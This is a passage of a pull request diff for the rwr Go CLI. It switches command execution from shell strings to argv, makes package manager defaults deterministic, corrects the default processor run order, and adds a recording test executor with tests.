### PR TITLE
fix: argv execution, evidence-based package manager detection, and run order

### DIFF
--- a/cmd/run.go
+++ b/cmd/run.go
@@ -45,14 +45,6 @@ var runFilesCmd = &cobra.Command{
 	},
 }
 
-var runDirectoriesCmd = &cobra.Command{
-	Use:   "directories",
-	Short: "Run directories processor",
-	RunE: func(cmd *cobra.Command, args []string) error {
-		return processors.All(initConfig, osInfo, []string{"directories"})
-	},
-}
-
 var runConfigurationCmd = &cobra.Command{
 	Use:   "configuration",
 	Short: "Run configuration processor",
@@ -118,7 +110,6 @@ func init() {
 	runCmd.AddCommand(runRepositoryCmd)
 	runCmd.AddCommand(runServicesCmd)
 	runCmd.AddCommand(runFilesCmd)
-	runCmd.AddCommand(runDirectoriesCmd)
 	runCmd.AddCommand(runConfigurationCmd)
 	runCmd.AddCommand(runUsersCmd)
 	runCmd.AddCommand(runGitCmd)

--- a/docs/cli/command-and-flags.md
+++ b/docs/cli/command-and-flags.md
@@ -60,11 +60,8 @@ Run the services processor.
 
 #### `rwr run files`
 
-Run the files processor.
-
-#### `rwr run directories`
-
-Run the directories processor.
+Run the files processor. This covers `files:`, `directories:` and `templates:`,
+which all live in a files blueprint.
 
 #### `rwr run configuration`
 

--- a/internal/exectest/recorder.go
+++ b/internal/exectest/recorder.go
@@ -1,0 +1,101 @@
+// Package exectest provides a recording system.Executor for tests.
+//
+// It lets a test drive a real processor end to end and then assert on exactly what
+// the processor asked to run — the argv, the elevation, the environment — without
+// installing packages or touching the system.
+package exectest
+
+import (
+	"fmt"
+
+	"github.com/fynxlabs/rwr/internal/types"
+)
+
+// Call is one recorded command.
+type Call struct {
+	Exec     string
+	Args     []string
+	Elevated bool
+	AsUser   string
+	LogName  string
+	Vars     map[string]string
+}
+
+// Argv is the full argument vector as the target program would receive it:
+// the executable followed by its arguments.
+func (c Call) Argv() []string {
+	return append([]string{c.Exec}, c.Args...)
+}
+
+// String renders the call for assertion failure messages.
+func (c Call) String() string {
+	return fmt.Sprintf("%v (elevated=%v asUser=%q)", c.Argv(), c.Elevated, c.AsUser)
+}
+
+// Recorder is a system.Executor that records commands instead of running them.
+type Recorder struct {
+	Calls []Call
+
+	// Err, when set, is returned from Run/Output for every call.
+	Err error
+	// Stdout is returned from Output.
+	Stdout string
+}
+
+// New returns an empty Recorder.
+func New() *Recorder { return &Recorder{} }
+
+// Run records the command and returns r.Err.
+func (r *Recorder) Run(cmd types.Command, _ bool) error {
+	r.record(cmd)
+	return r.Err
+}
+
+// Output records the command and returns r.Stdout and r.Err.
+func (r *Recorder) Output(cmd types.Command, _ bool) (string, error) {
+	r.record(cmd)
+	return r.Stdout, r.Err
+}
+
+func (r *Recorder) record(cmd types.Command) {
+	args := make([]string, len(cmd.Args))
+	copy(args, cmd.Args)
+	r.Calls = append(r.Calls, Call{
+		Exec:     cmd.Exec,
+		Args:     args,
+		Elevated: cmd.Elevated,
+		AsUser:   cmd.AsUser,
+		LogName:  cmd.LogName,
+		Vars:     cmd.Variables,
+	})
+}
+
+// Last returns the most recent call, or false if nothing was recorded.
+func (r *Recorder) Last() (Call, bool) {
+	if len(r.Calls) == 0 {
+		return Call{}, false
+	}
+	return r.Calls[len(r.Calls)-1], true
+}
+
+// Find returns the calls whose executable path ends with the given name.
+func (r *Recorder) Find(exec string) []Call {
+	var out []Call
+	for _, c := range r.Calls {
+		if c.Exec == exec || hasSuffixPath(c.Exec, exec) {
+			out = append(out, c)
+		}
+	}
+	return out
+}
+
+func hasSuffixPath(path, name string) bool {
+	if len(path) <= len(name) {
+		return false
+	}
+	if path[len(path)-len(name):] != name {
+		return false
+	}
+	sep := path[len(path)-len(name)-1]
+	return sep == '/' || sep == '\\'
+}

--- a/internal/processors/all.go
+++ b/internal/processors/all.go
@@ -162,7 +162,7 @@ func All(initConfig *types.InitConfig, osInfo *types.OSInfo, runOrder []string) 
 					err = ProcessSSHKeys(resolvedBlueprint, format, osInfo, initConfig)
 				case types.BlueprintTypeFonts:
 					log.Info("Processing fonts")
-					err = ProcessFonts(blueprintData, blueprintDir, format, osInfo, initConfig)
+					err = ProcessFonts(resolvedBlueprint, blueprintDir, format, osInfo, initConfig)
 				case types.BlueprintTypeConfiguration:
 					log.Infof("Processing configurations")
 					err = ProcessConfiguration(resolvedBlueprint, blueprintDir, format, initConfig)

--- a/internal/processors/blueprints.go
+++ b/internal/processors/blueprints.go
@@ -83,10 +83,32 @@ func GetBlueprints(initConfig *types.InitConfig) (string, error) {
 	return location, nil
 }
 
+// defaultRunOrder is the order blueprint processors run in when the init file
+// does not specify one.
+//
+// packageManagers is deliberately absent: it is not dispatched from the blueprint
+// loop at all, it runs ahead of it from initConfig.PackageManagers. Listing it
+// here only produced an "Unknown processor" warning.
+//
+// users is present because it was previously missing, which meant `rwr all` never
+// created users unless the init file hand-wrote its own order — while
+// `rwr run users` worked, making the omission easy to miss.
+var defaultRunOrder = []string{
+	types.BlueprintTypeRepositories,
+	types.BlueprintTypePackages,
+	types.BlueprintTypeSSHKeys,
+	types.BlueprintTypeUsers,
+	types.BlueprintTypeFiles,
+	types.BlueprintTypeFonts,
+	types.BlueprintTypeServices,
+	types.BlueprintTypeGit,
+	types.BlueprintTypeScripts,
+	types.BlueprintTypeConfiguration,
+}
+
 // GetBlueprintRunOrder determines the order in which blueprint processors should run.
 // If a custom order is specified in the init configuration, it uses that order.
-// Otherwise, it returns the default processor execution order (packageManagers,
-// repositories, packages, ssh_keys, files, fonts, services, git, scripts, configuration).
+// Otherwise, it returns defaultRunOrder.
 // Returns a slice of processor names in execution order.
 func GetBlueprintRunOrder(initConfig *types.InitConfig) ([]string, error) {
 	var runOrder []string
@@ -102,7 +124,7 @@ func GetBlueprintRunOrder(initConfig *types.InitConfig) ([]string, error) {
 			}
 		}
 	} else {
-		runOrder = append(runOrder, types.BlueprintTypePackageManagers, types.BlueprintTypeRepositories, types.BlueprintTypePackages, types.BlueprintTypeSSHKeys, types.BlueprintTypeFiles, types.BlueprintTypeFonts, types.BlueprintTypeServices, types.BlueprintTypeGit, types.BlueprintTypeScripts, types.BlueprintTypeConfiguration)
+		runOrder = append(runOrder, defaultRunOrder...)
 	}
 
 	log.Debugf("Blueprint run order: %v", runOrder)

--- a/internal/processors/blueprints_test.go
+++ b/internal/processors/blueprints_test.go
@@ -23,8 +23,11 @@ func TestGetBlueprintRunOrder_DefaultOrder(t *testing.T) {
 		t.Fatalf("Expected no error, got: %v", err)
 	}
 
+	// users is included (it was missing, so `rwr all` never processed users) and
+	// packageManagers is not (it runs from initConfig ahead of the blueprint loop
+	// and has no dispatch case, so listing it only warned "Unknown processor").
 	expectedOrder := []string{
-		"packageManagers", "repositories", "packages", "ssh_keys",
+		"repositories", "packages", "ssh_keys", "users",
 		"files", "fonts", "services", "git", "scripts", "configuration",
 	}
 

--- a/internal/processors/configuration.go
+++ b/internal/processors/configuration.go
@@ -100,7 +100,7 @@ func processGSettings(config types.Configuration) error {
 		log.Debugf("Processing key: %s with value: %v", key, value)
 
 		// Check if the key is writable
-		checkCmd := exec.Command("gsettings", "writable", config.Schema, key) // #nosec G204 -- TODO(PR1): replaced by argv executor; no shell interpolation after that lands
+		checkCmd := exec.Command("gsettings", "writable", config.Schema, key) // #nosec G204 -- argv, not a shell string: schema/key/value are passed as discrete arguments
 		output, err := checkCmd.CombinedOutput()
 		if err != nil {
 			log.Warnf("Error checking if key is writable - Schema: %s, Key: %s, Error: %v, Output: %s", config.Schema, key, err, string(output))
@@ -119,7 +119,7 @@ func processGSettings(config types.Configuration) error {
 		args := []string{"set", config.Schema, key, strValue}
 		log.Debugf("Executing command: gsettings %s", strings.Join(args, " "))
 
-		cmd := exec.Command("gsettings", args...) // #nosec G204 -- TODO(PR1): replaced by argv executor; no shell interpolation after that lands
+		cmd := exec.Command("gsettings", args...) // #nosec G204 -- argv, not a shell string: schema/key/value are passed as discrete arguments
 		output, err = cmd.CombinedOutput()
 		if err != nil {
 			log.Errorf("Error applying gsettings configuration - Schema: %s, Key: %s, Value: %s, Error: %v, Output: %s", config.Schema, key, strValue, err, string(output))

--- a/internal/processors/packages.go
+++ b/internal/processors/packages.go
@@ -4,6 +4,7 @@ import (
 	"fmt"
 	"os"
 	"path/filepath"
+	"sort"
 	"strings"
 
 	"github.com/charmbracelet/log"
@@ -123,9 +124,10 @@ func ProcessPackages(data []byte, packages *types.PackagesData, format string, o
 				continue
 			}
 		} else {
-			for _, p := range available {
-				provider = p
-				break
+			provider, exists = defaultProviderFor(osInfo, available)
+			if !exists {
+				log.Warnf("No package manager available for package %s, skipping", pkg.Name)
+				continue
 			}
 		}
 
@@ -177,4 +179,34 @@ func ProcessPackages(data []byte, packages *types.PackagesData, format string, o
 	}
 
 	return nil
+}
+
+// defaultProviderFor picks the provider to use for a package that did not name a
+// package_manager.
+//
+// It prefers the default resolved during OS detection (which honours
+// /etc/os-release and, on Arch, the AUR helper preference order), and otherwise
+// falls back to the alphabetically first available provider. The fallback is
+// sorted because Go randomizes map iteration: selecting "whatever the map yields
+// first" meant an unqualified package could be installed by a different package
+// manager on every run.
+func defaultProviderFor(osInfo *types.OSInfo, available map[string]*types.Provider) (*types.Provider, bool) {
+	if osInfo != nil {
+		if name := osInfo.PackageManager.Default.Name; name != "" {
+			if provider, ok := available[name]; ok {
+				return provider, true
+			}
+		}
+	}
+
+	names := make([]string, 0, len(available))
+	for name := range available {
+		names = append(names, name)
+	}
+	sort.Strings(names)
+
+	if len(names) == 0 {
+		return nil, false
+	}
+	return available[names[0]], true
 }

--- a/internal/processors/respository.go
+++ b/internal/processors/respository.go
@@ -4,6 +4,7 @@ import (
 	"fmt"
 	"os"
 	"path/filepath"
+	"strings"
 
 	"github.com/charmbracelet/log"
 	"github.com/fynxlabs/rwr/internal/helpers"
@@ -138,7 +139,8 @@ func processRepositories(repositories []types.Repository, osInfo *types.OSInfo, 
 
 		log.Infof("Processing %s Updates", name)
 		updateCmd := types.Command{
-			Exec:     fmt.Sprintf("%s %s", provider.BinPath, provider.Commands.Update),
+			Exec:     provider.BinPath,
+			Args:     strings.Fields(provider.Commands.Update),
 			Elevated: provider.Elevated,
 		}
 

--- a/internal/processors/run_order_test.go
+++ b/internal/processors/run_order_test.go
@@ -1,0 +1,97 @@
+package processors
+
+import (
+	"slices"
+	"testing"
+
+	"github.com/fynxlabs/rwr/internal/types"
+)
+
+// Every processor named in the default run order must have a dispatch case in
+// All. An entry without one falls through to `default:` and logs "Unknown
+// processor", so a blueprint of that type is silently skipped — which is what
+// packageManagers did.
+func TestDefaultRunOrder_EveryEntryIsDispatched(t *testing.T) {
+	dispatched := []string{
+		types.BlueprintTypeRepositories,
+		types.BlueprintTypePackages,
+		types.BlueprintTypeFiles,
+		types.BlueprintTypeServices,
+		types.BlueprintTypeUsers,
+		types.BlueprintTypeGit,
+		types.BlueprintTypeScripts,
+		types.BlueprintTypeSSHKeys,
+		types.BlueprintTypeFonts,
+		types.BlueprintTypeConfiguration,
+	}
+
+	for _, processor := range defaultRunOrder {
+		if !slices.Contains(dispatched, processor) {
+			t.Errorf("default run order includes %q, which All has no dispatch case for; "+
+				"blueprints of that type would be silently skipped", processor)
+		}
+	}
+}
+
+// users was missing from the default order, so `rwr all` never processed user
+// blueprints unless the init file hand-wrote its own order — even though
+// `rwr run users` worked, which made the gap easy to miss.
+func TestDefaultRunOrder_IncludesEveryDispatchableProcessor(t *testing.T) {
+	// Every type that has a dispatch case in All and can appear as a blueprint
+	// directory must be reachable from a default `rwr all`.
+	want := []string{
+		types.BlueprintTypeRepositories,
+		types.BlueprintTypePackages,
+		types.BlueprintTypeFiles,
+		types.BlueprintTypeServices,
+		types.BlueprintTypeUsers,
+		types.BlueprintTypeGit,
+		types.BlueprintTypeScripts,
+		types.BlueprintTypeSSHKeys,
+		types.BlueprintTypeFonts,
+		types.BlueprintTypeConfiguration,
+	}
+
+	for _, processor := range want {
+		if !slices.Contains(defaultRunOrder, processor) {
+			t.Errorf("%q has a dispatch case but is missing from the default run order, "+
+				"so `rwr all` would never run it", processor)
+		}
+	}
+}
+
+// packageManagers runs ahead of the blueprint loop, from initConfig, and has no
+// case in the dispatch switch. Listing it in the run order only produced an
+// "Unknown processor" warning.
+func TestDefaultRunOrder_ExcludesPackageManagers(t *testing.T) {
+	if slices.Contains(defaultRunOrder, types.BlueprintTypePackageManagers) {
+		t.Error("packageManagers must not be in the blueprint run order; it is processed " +
+			"separately from initConfig before the loop and has no dispatch case")
+	}
+}
+
+func TestGetBlueprintRunOrder_UsesDefaultWhenInitSpecifiesNone(t *testing.T) {
+	order, err := GetBlueprintRunOrder(&types.InitConfig{})
+	if err != nil {
+		t.Fatalf("GetBlueprintRunOrder: %v", err)
+	}
+
+	if !slices.Equal(order, defaultRunOrder) {
+		t.Errorf("run order = %v, want the default %v", order, defaultRunOrder)
+	}
+}
+
+func TestGetBlueprintRunOrder_HonoursInitOrder(t *testing.T) {
+	initConfig := &types.InitConfig{}
+	initConfig.Init.Order = []interface{}{"packages", "files"}
+
+	order, err := GetBlueprintRunOrder(initConfig)
+	if err != nil {
+		t.Fatalf("GetBlueprintRunOrder: %v", err)
+	}
+
+	want := []string{"packages", "files"}
+	if !slices.Equal(order, want) {
+		t.Errorf("run order = %v, want %v", order, want)
+	}
+}

--- a/internal/processors/scripts.go
+++ b/internal/processors/scripts.go
@@ -4,6 +4,7 @@ import (
 	"fmt"
 	"os"
 	"path/filepath"
+	"strings"
 
 	"github.com/fynxlabs/rwr/internal/helpers"
 	"github.com/fynxlabs/rwr/internal/types"
@@ -164,10 +165,13 @@ func runScript(script types.Script, osInfo *types.OSInfo, initConfig *types.Init
 		return fmt.Errorf("unsupported script executor: %s", script.Exec)
 	}
 
-	// Append the script arguments
+	// Append the script arguments. `args` is a single string in the blueprint, and
+	// the shell used to word-split it on the way to the script. Now that commands are
+	// argv, split it here — otherwise `args: "--verbose --out /tmp"` would arrive as
+	// one argument instead of three.
 	if script.Args != "" {
 		log.Debugf("Adding script arguments: %s", script.Args)
-		scriptCmd.Args = append(scriptCmd.Args, script.Args)
+		scriptCmd.Args = append(scriptCmd.Args, strings.Fields(script.Args)...)
 	}
 
 	// Set the log name

--- a/internal/processors/scripts_argv_test.go
+++ b/internal/processors/scripts_argv_test.go
@@ -1,0 +1,103 @@
+package processors
+
+import (
+	"os"
+	"path/filepath"
+	"testing"
+
+	"github.com/fynxlabs/rwr/internal/exectest"
+	"github.com/fynxlabs/rwr/internal/system"
+	"github.com/fynxlabs/rwr/internal/types"
+)
+
+// scriptOSInfo returns an OSInfo with just enough tooling populated to run the
+// scripts processor without touching the host's real tool discovery.
+func scriptOSInfo() *types.OSInfo {
+	osInfo := &types.OSInfo{}
+	osInfo.System.OS = "linux"
+	osInfo.Tools.Bash = types.ToolInfo{Exists: true, Bin: "/bin/bash"}
+	return osInfo
+}
+
+// `args` is a single string in the blueprint. The shell used to word-split it on
+// the way to the script; with argv execution the processor has to split it, or
+// "--verbose --out /tmp" would arrive as one argument instead of three.
+func TestProcessScripts_ArgsAreSplitIntoSeparateArguments(t *testing.T) {
+	rec := exectest.New()
+	defer system.SetExecutor(rec)()
+
+	dir := t.TempDir()
+	scriptPath := filepath.Join(dir, "setup.sh")
+	if err := os.WriteFile(scriptPath, []byte("#!/bin/bash\necho hi\n"), 0o700); err != nil {
+		t.Fatalf("writing script: %v", err)
+	}
+
+	blueprint := []byte(`
+scripts:
+  - name: "setup.sh"
+    action: "run"
+    source: "."
+    exec: "bash"
+    args: "--verbose --out /tmp/out"
+`)
+
+	err := ProcessScripts(blueprint, dir, "yaml", scriptOSInfo(), &types.InitConfig{})
+	if err != nil {
+		t.Fatalf("ProcessScripts: %v", err)
+	}
+
+	if len(rec.Calls) != 1 {
+		t.Fatalf("recorded %d calls, want 1: %v", len(rec.Calls), rec.Calls)
+	}
+
+	call := rec.Calls[0]
+	if call.Exec != "/bin/bash" {
+		t.Errorf("Exec = %q, want /bin/bash", call.Exec)
+	}
+
+	// script path, then each blueprint arg as its own element
+	want := []string{scriptPath, "--verbose", "--out", "/tmp/out"}
+	if len(call.Args) != len(want) {
+		t.Fatalf("Args = %#v, want %#v", call.Args, want)
+	}
+	for i := range want {
+		if call.Args[i] != want[i] {
+			t.Fatalf("Args = %#v, want %#v", call.Args, want)
+		}
+	}
+}
+
+// The script path is passed as its own argv element, so a directory containing a
+// space cannot split into two arguments.
+func TestProcessScripts_ScriptPathWithSpacesStaysOneArgument(t *testing.T) {
+	rec := exectest.New()
+	defer system.SetExecutor(rec)()
+
+	dir := filepath.Join(t.TempDir(), "my scripts")
+	if err := os.MkdirAll(dir, 0o750); err != nil {
+		t.Fatalf("mkdir: %v", err)
+	}
+	scriptPath := filepath.Join(dir, "setup.sh")
+	if err := os.WriteFile(scriptPath, []byte("#!/bin/bash\n"), 0o700); err != nil {
+		t.Fatalf("writing script: %v", err)
+	}
+
+	blueprint := []byte(`
+scripts:
+  - name: "setup.sh"
+    action: "run"
+    source: "."
+    exec: "bash"
+`)
+
+	if err := ProcessScripts(blueprint, dir, "yaml", scriptOSInfo(), &types.InitConfig{}); err != nil {
+		t.Fatalf("ProcessScripts: %v", err)
+	}
+
+	if len(rec.Calls) != 1 {
+		t.Fatalf("recorded %d calls, want 1: %v", len(rec.Calls), rec.Calls)
+	}
+	if got := rec.Calls[0].Args; len(got) != 1 || got[0] != scriptPath {
+		t.Errorf("Args = %#v, want exactly [%q]", got, scriptPath)
+	}
+}

--- a/internal/processors/ssh_key.go
+++ b/internal/processors/ssh_key.go
@@ -192,34 +192,27 @@ func generateSSHKey(sshKey types.SSHKey, initConfig *types.InitConfig) (string, 
 		return sshPath, nil
 	}
 
-	// Build the command differently based on whether we need a passphrase
-	var cmd types.Command
 	interactive := helpers.ResolveInteractive(sshKey.Interactive, initConfig.Variables.Flags.Interactive)
 
+	args := []string{
+		"-t", sshKey.Type,
+		"-C", sshKey.Comment,
+		"-f", sshPath,
+	}
 	if sshKey.NoPassphrase {
-		// For no passphrase, use a single string command that properly handles the empty string
-		cmdStr := fmt.Sprintf("ssh-keygen -t %s -C %s -f %s -N ''",
-			sshKey.Type, sshKey.Comment, sshPath)
-
-		cmd = types.Command{
-			Exec:        cmdStr,
-			Args:        []string{},
-			Interactive: interactive,
-		}
-	} else {
-		// For normal case with passphrase prompt
-		cmd = types.Command{
-			Exec: "ssh-keygen",
-			Args: []string{
-				"-t", sshKey.Type,
-				"-C", sshKey.Comment,
-				"-f", sshPath,
-			},
-			Interactive: interactive,
-		}
+		// An empty passphrase is just an empty argv element. The shell quoting that
+		// `-N ''` used to need only existed because the command was a shell string;
+		// blueprint-supplied Type/Comment went through that same shell.
+		args = append(args, "-N", "")
 	}
 
-	err := system.RunCommand(cmd, true)
+	cmd := types.Command{
+		Exec:        "ssh-keygen",
+		Args:        args,
+		Interactive: interactive,
+	}
+
+	err := system.RunCommand(cmd, initConfig.Variables.Flags.Debug)
 	if err != nil {
 		return "", fmt.Errorf("error generating SSH key: %v", err)
 	}

--- a/internal/system/clean.go
+++ b/internal/system/clean.go
@@ -1,6 +1,8 @@
 package system
 
 import (
+	"strings"
+
 	"github.com/charmbracelet/log"
 	"github.com/fynxlabs/rwr/internal/types"
 )
@@ -17,8 +19,11 @@ func CleanPackageManagers(osInfo *types.OSInfo, initConfig *types.InitConfig) er
 		log.Debugf("Running clean command for package manager: %s", name)
 		log.Debugf(" Running clean command: %s", pm.Clean)
 
+		// pm.Clean is "<bin> <clean args>"; split it back into argv rather than
+		// handing the whole string to a shell.
 		cleanCmd := types.Command{
-			Exec:     pm.Clean,
+			Exec:     pm.Bin,
+			Args:     strings.Fields(strings.TrimPrefix(pm.Clean, pm.Bin)),
 			Elevated: pm.Elevated,
 		}
 

--- a/internal/system/clean_test.go
+++ b/internal/system/clean_test.go
@@ -1,0 +1,71 @@
+package system
+
+import (
+	"testing"
+
+	"github.com/fynxlabs/rwr/internal/exectest"
+	"github.com/fynxlabs/rwr/internal/types"
+)
+
+// PackageManagerInfo.Clean is stored pre-joined as "<bin> <clean args>". It used
+// to be assigned straight to Command.Exec and word-split by the shell; with argv
+// execution it has to be split back into a program and its arguments, or the whole
+// string would be treated as one executable name and fail with ENOENT.
+func TestCleanPackageManagers_SplitsCleanCommandIntoArgv(t *testing.T) {
+	rec := exectest.New()
+	defer SetExecutor(rec)()
+
+	osInfo := &types.OSInfo{}
+	osInfo.PackageManager.Managers = map[string]types.PackageManagerInfo{
+		"pacman": {
+			Name:     "pacman",
+			Bin:      "/usr/bin/pacman",
+			Clean:    "/usr/bin/pacman -Sc --noconfirm",
+			Elevated: true,
+		},
+	}
+
+	if err := CleanPackageManagers(osInfo, &types.InitConfig{}); err != nil {
+		t.Fatalf("CleanPackageManagers: %v", err)
+	}
+
+	if len(rec.Calls) != 1 {
+		t.Fatalf("recorded %d calls, want 1: %v", len(rec.Calls), rec.Calls)
+	}
+
+	got := rec.Calls[0]
+	if got.Exec != "/usr/bin/pacman" {
+		t.Errorf("Exec = %q, want %q", got.Exec, "/usr/bin/pacman")
+	}
+	want := []string{"-Sc", "--noconfirm"}
+	if len(got.Args) != len(want) {
+		t.Fatalf("Args = %#v, want %#v", got.Args, want)
+	}
+	for i := range want {
+		if got.Args[i] != want[i] {
+			t.Fatalf("Args = %#v, want %#v", got.Args, want)
+		}
+	}
+	if !got.Elevated {
+		t.Error("clean command should stay elevated")
+	}
+}
+
+// A manager with no clean command must not produce a call at all.
+func TestCleanPackageManagers_SkipsManagersWithoutCleanCommand(t *testing.T) {
+	rec := exectest.New()
+	defer SetExecutor(rec)()
+
+	osInfo := &types.OSInfo{}
+	osInfo.PackageManager.Managers = map[string]types.PackageManagerInfo{
+		"mas": {Name: "mas", Bin: "/usr/local/bin/mas"},
+	}
+
+	if err := CleanPackageManagers(osInfo, &types.InitConfig{}); err != nil {
+		t.Fatalf("CleanPackageManagers: %v", err)
+	}
+
+	if len(rec.Calls) != 0 {
+		t.Errorf("recorded %d calls, want 0: %v", len(rec.Calls), rec.Calls)
+	}
+}

--- a/internal/system/commands.go
+++ b/internal/system/commands.go
@@ -18,27 +18,38 @@ import (
 	"github.com/fynxlabs/rwr/internal/types"
 )
 
-// buildCommand creates an *exec.Cmd based on the execution options specified in the
-// given types.Command. It handles elevated (sudo/admin) execution, running as a
-// specific user, and normal execution, with platform-specific behavior for Windows
-// vs Unix systems.
+// buildCommand creates an *exec.Cmd from the given types.Command.
+//
+// Commands are built as argv and handed directly to the kernel — no shell is
+// interposed. Every element of cmd.Args reaches the target program as exactly one
+// argument, so blueprint-supplied values (package names, paths, comments, password
+// hashes) cannot be reinterpreted as shell syntax and arguments containing spaces
+// survive intact.
+//
+// A shell is still available when a provider genuinely wants one; it just has to
+// say so explicitly, e.g. exec = "sh" with args = ["-c", "cd /tmp/paru && makepkg"].
+//
+// Elevation is unchanged in policy — it remains per-command via Elevated/AsUser —
+// only the spawn differs. "--" terminates sudo's own option parsing so a command
+// whose name begins with a dash cannot be absorbed as a sudo flag. Windows has no
+// sudo: Elevated is a no-op there and the process must already be elevated, which
+// matches the previous behavior of running through `cmd /C` without any elevation.
 func buildCommand(cmd types.Command) *exec.Cmd {
-	fullCmd := fmt.Sprintf("%s %s", cmd.Exec, strings.Join(cmd.Args, " "))
-
-	if cmd.Elevated {
-		if runtime.GOOS == "windows" {
-			log.Debugf("Running command as elevated - Running Command: %v %v", cmd.Exec, cmd.Args)
-			return exec.Command("cmd", "/C", fullCmd) // #nosec G204 -- TODO(PR1): replaced by argv executor; no shell interpolation after that lands
+	if runtime.GOOS != "windows" {
+		if cmd.Elevated {
+			log.Debugf("Running command as sudo - Running Command: %v %v", cmd.Exec, cmd.Args)
+			return exec.Command("sudo", append([]string{"--", cmd.Exec}, cmd.Args...)...) // #nosec G204 -- argv, not a shell string: args are passed as discrete arguments
 		}
-		log.Debugf("Running command as sudo - Running Command: %v %v", cmd.Exec, cmd.Args)
-		return exec.Command("sudo", "sh", "-c", fullCmd) // #nosec G204 -- TODO(PR1): replaced by argv executor; no shell interpolation after that lands
-	} else if cmd.AsUser != "" {
-		log.Debugf("Running command as user: %v - Running Command: %v %v", cmd.AsUser, cmd.Exec, cmd.Args)
-		return exec.Command("sudo", "-u", cmd.AsUser, "sh", "-c", fullCmd) // #nosec G204 -- TODO(PR1): replaced by argv executor; no shell interpolation after that lands
+		if cmd.AsUser != "" {
+			log.Debugf("Running command as user: %v - Running Command: %v %v", cmd.AsUser, cmd.Exec, cmd.Args)
+			return exec.Command("sudo", append([]string{"-u", cmd.AsUser, "--", cmd.Exec}, cmd.Args...)...) // #nosec G204 -- argv, not a shell string: args are passed as discrete arguments
+		}
+	} else if cmd.Elevated {
+		log.Debugf("Elevated requested on Windows; running in-process (no sudo equivalent): %v %v", cmd.Exec, cmd.Args)
 	}
 
 	log.Debugf("Running command: %v %v", cmd.Exec, cmd.Args)
-	return exec.Command("sh", "-c", fullCmd) // #nosec G204 -- TODO(PR1): replaced by argv executor; no shell interpolation after that lands
+	return exec.Command(cmd.Exec, cmd.Args...) // #nosec G204 -- argv, not a shell string: args are passed as discrete arguments
 }
 
 // setupCommandEnvironment configures the environment variables and PATH for the
@@ -82,6 +93,11 @@ func IsDryRun() bool {
 // on the interactive flag and debug mode. Returns an error if the command fails.
 // In dry-run mode, it logs the command without executing it.
 func RunCommand(cmd types.Command, debug bool) error {
+	return current.Run(cmd, debug)
+}
+
+// runCommand is the real implementation behind osExecutor.Run.
+func runCommand(cmd types.Command, debug bool) error {
 	if dryRunMode {
 		log.Infof("[DRY-RUN] Would execute: %s %s", cmd.Exec, strings.Join(cmd.Args, " "))
 		return nil
@@ -91,19 +107,33 @@ func RunCommand(cmd types.Command, debug bool) error {
 	setupCommandEnvironment(command, cmd)
 
 	var stderr bytes.Buffer
-	command.Stderr = &stderr
 
 	if cmd.Interactive {
+		// Interactive commands must reach the terminal directly. Capturing stderr
+		// here would swallow sudo's password prompt and hang the run with no
+		// indication of what it was waiting for.
 		command.Stdin = os.Stdin
 		command.Stdout = os.Stdout
+		command.Stderr = os.Stderr
 	} else {
-		setOutputStreams(command, debug, cmd.LogName)
+		command.Stderr = &stderr
+		logFile, err := setOutputStreams(command, debug, cmd.LogName)
+		if err != nil {
+			return err
+		}
+		if logFile != nil {
+			// Closed after Run, not before it: the command writes to this
+			// descriptor while it executes.
+			defer func() {
+				if cerr := logFile.Close(); cerr != nil {
+					log.Errorf("Error closing log file: %v", cerr)
+				}
+			}()
+		}
 	}
 
-	err := command.Run()
-	if err != nil {
-		errMsg := fmt.Sprintf("Error running command: %v\nStderr: %s", err, stderr.String())
-		log.Error(errMsg)
+	if err := command.Run(); err != nil {
+		log.Errorf("Error running command: %v\nStderr: %s", err, stderr.String())
 		return err
 	}
 
@@ -115,6 +145,11 @@ func RunCommand(cmd types.Command, debug bool) error {
 // but captures and returns stdout instead of streaming it. Returns the command output
 // and an error if the command fails.
 func RunCommandOutput(cmd types.Command, debug bool) (string, error) {
+	return current.Output(cmd, debug)
+}
+
+// runCommandOutput is the real implementation behind osExecutor.Output.
+func runCommandOutput(cmd types.Command, debug bool) (string, error) {
 	if dryRunMode {
 		log.Infof("[DRY-RUN] Would execute: %s %s", cmd.Exec, strings.Join(cmd.Args, " "))
 		return "", nil
@@ -138,28 +173,32 @@ func RunCommandOutput(cmd types.Command, debug bool) (string, error) {
 	return stdout.String(), nil
 }
 
-// setOutputStreams sets the standard output stream for a command based on the log level and log name.
-func setOutputStreams(cmd *exec.Cmd, debug bool, logName string) {
+// setOutputStreams points the command's stdout at the terminal (debug) or at the
+// blueprint's log file. When a log file is opened it is returned so the caller can
+// close it *after* the command has run — closing it here would hand the command a
+// dead descriptor and silently discard everything it wrote.
+func setOutputStreams(cmd *exec.Cmd, debug bool, logName string) (*os.File, error) {
 	log.Debugf("Debug: %v", debug)
 	log.Debugf("Log Name: %v", logName)
+
 	if debug {
 		log.Debugf("Debug set, configuring stdout for command: %v", cmd.Path)
 		cmd.Stdout = os.Stdout
-	} else if logName != "" {
-		file, err := os.OpenFile(logName, os.O_APPEND|os.O_CREATE|os.O_WRONLY, 0644) // #nosec G302 G304 -- TODO(PR8): create with target mode instead of chmod-after; path is operator-supplied blueprint/config input; containment added in PR8
-		if err != nil {
-			log.Errorf("Error opening log file: %v", err)
-			return
-		}
-		defer func(file *os.File) {
-			err := file.Close()
-			if err != nil {
-				log.Errorf("Error closing log file: %v", err)
-			}
-		}(file)
-
-		cmd.Stdout = file
+		return nil, nil
 	}
+
+	if logName == "" {
+		return nil, nil
+	}
+
+	file, err := os.OpenFile(logName, os.O_APPEND|os.O_CREATE|os.O_WRONLY, 0644) // #nosec G302 G304 -- TODO(PR8): create with target mode instead of chmod-after; path is operator-supplied blueprint/config input; containment added in PR8
+	if err != nil {
+		log.Errorf("Error opening log file: %v", err)
+		return nil, fmt.Errorf("error opening log file %q: %w", logName, err)
+	}
+
+	cmd.Stdout = file
+	return file, nil
 }
 
 // CommandExists checks if a command exists in the system's PATH.

--- a/internal/system/commands_test.go
+++ b/internal/system/commands_test.go
@@ -1,8 +1,10 @@
 package system
 
 import (
+	"os"
 	"path/filepath"
 	"runtime"
+	"strings"
 	"testing"
 
 	"github.com/fynxlabs/rwr/internal/types"
@@ -96,194 +98,237 @@ func TestGetBinPath_EmptyCommand(t *testing.T) {
 	}
 }
 
-// Test Command struct validation and basic functionality.
-func TestCommand_BasicStructure(t *testing.T) {
-	cmd := types.Command{
-		Exec:        "echo",
-		Args:        []string{"hello", "world"},
-		Variables:   map[string]string{"TEST_VAR": "test_value"},
-		LogName:     "test.log",
-		AsUser:      "testuser",
-		Interactive: false,
-		Elevated:    false,
+// argvOf returns the argument vector buildCommand produced, which is what the
